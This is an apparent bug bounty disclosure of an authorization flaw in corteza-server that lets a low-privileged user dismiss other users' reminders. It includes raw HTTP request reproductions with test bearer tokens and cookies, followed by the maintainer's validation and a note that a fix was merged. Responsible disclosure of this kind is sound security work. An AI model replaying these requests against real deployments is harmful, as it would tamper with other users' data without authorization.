Improper Privilege Management in cortezaproject/corteza-server

Valid

Reported on

Jun 13th 2021


💥 BUG

unprivileged user can dismiss other user reminders

💥 IMPACT

lower level user can dismiss other user reminders

💥 STEP TO REPRODUCE

1. First from admin goto http://localhost:18080/admin/system/user and add a new user called user B .
Now give this user crm permission so that user B can create Contacts .
\

2. Now from admin account create a reminders and and assign himself to this reminders. here during creation bellow request is sent to server

POST /api/system/reminder/ HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjM1MjI4NTcsInJvbGVzIjoiIiwic2NvcGUiOiJwcm9maWxlIGFwaSIsInN1YiI6IjIzNDQ4Mjc2NzY1NDU2Mzg0MyJ9.rtQSQpwMD7UVTRc97H_80xQVPpDitk6ju8Ol9SuTdcZh04IkCAgHxCpwVXam3H9l3nAn1X0KfWwtwAL_Vj5KaA
Content-Length: 99
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/compose/ns/service-solution/pages/234475729596461059
Cookie: SMFCookie600=a%3A4%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bs%3A40%3A%22ea9158087600b4a7257e1195dc5ee8400dad5dde%22%3Bi%3A2%3Bi%3A1812683445%3Bi%3A3%3Bi%3A0%3B%7D; ElkArteCookie700=%5B1%2C%224c031ed3b44635aa46fd4f03bdfcc8ee74fb7ac1d75817cf0c156eb16bd0965e%22%2C1812706690%2C2%5D
Account: test2

{"resource":"0","assignedTo":"234476336394022915","payload":{"title":"remain11","notes":"by_user"}}


3. Now goto user B account and sent bellow request to get the above admins remonder

GET /api/system/reminder/?assignedTo=234476336394022915&limit=0 HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjM1MjI4NTcsInJvbGVzIjoiIiwic2NvcGUiOiJwcm9maWxlIGFwaSIsInN1YiI6IjIzNDQ4Mjc2NzY1NDU2Mzg0MyJ9.rtQSQpwMD7UVTRc97H_80xQVPpDitk6ju8Ol9SuTdcZh04IkCAgHxCpwVXam3H9l3nAn1X0KfWwtwAL_Vj5KaA
Connection: close
Referer: http://localhost:18080/compose/ns/service-solution/pages/234475729596461059
Cookie: SMFCookie600=a%3A4%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bs%3A40%3A%22ea9158087600b4a7257e1195dc5ee8400dad5dde%22%3Bi%3A2%3Bi%3A1812683445%3Bi%3A3%3Bi%3A0%3B%7D; ElkArteCookie700=%5B1%2C%224c031ed3b44635aa46fd4f03bdfcc8ee74fb7ac1d75817cf0c156eb16bd0965e%22%2C1812706690%2C2%5D
Account: test2

Here user B just captured the reminder-id of above created reminder by admin .

Now user B sent bellow request to dismiss this reminder

PATCH /api/system/reminder/235364624197758979/dismiss HTTP/1.1
Host: localhost:18080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIyMzQ0NzU3MzExMDU2MjQwNjciLCJleHAiOjE2MjM1MjI4NTcsInJvbGVzIjoiIiwic2NvcGUiOiJwcm9maWxlIGFwaSIsInN1YiI6IjIzNDQ4Mjc2NzY1NDU2Mzg0MyJ9.rtQSQpwMD7UVTRc97H_80xQVPpDitk6ju8Ol9SuTdcZh04IkCAgHxCpwVXam3H9l3nAn1X0KfWwtwAL_Vj5KaA
Origin: http://localhost:18080
Connection: close
Referer: http://localhost:18080/compose/ns/service-solution/pages/234475729596461059
Cookie: SMFCookie600=a%3A4%3A%7Bi%3A0%3Bi%3A1%3Bi%3A1%3Bs%3A40%3A%22ea9158087600b4a7257e1195dc5ee8400dad5dde%22%3Bi%3A2%3Bi%3A1812683445%3Bi%3A3%3Bi%3A0%3B%7D; ElkArteCookie700=%5B1%2C%224c031ed3b44635aa46fd4f03bdfcc8ee74fb7ac1d75817cf0c156eb16bd0965e%22%2C1812706690%2C2%5D
Account: test2

Here in this request change reminder id to above captured reminder id .\

So, user B can dismiss the reminder of admin .

Tomaž Jerman
6 months ago

Hi, thank you for the report. I was, unfortunately, unable to confirm/deny this report, but I will make one of our guys look into it asap, and resolve it if needed.

ranjit-git
3 months ago

Researcher


hello, any update?

Tomaž Jerman validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Tomaž Jerman confirmed that a fix has been merged on 033447 a month ago
The fix bounty has been dropped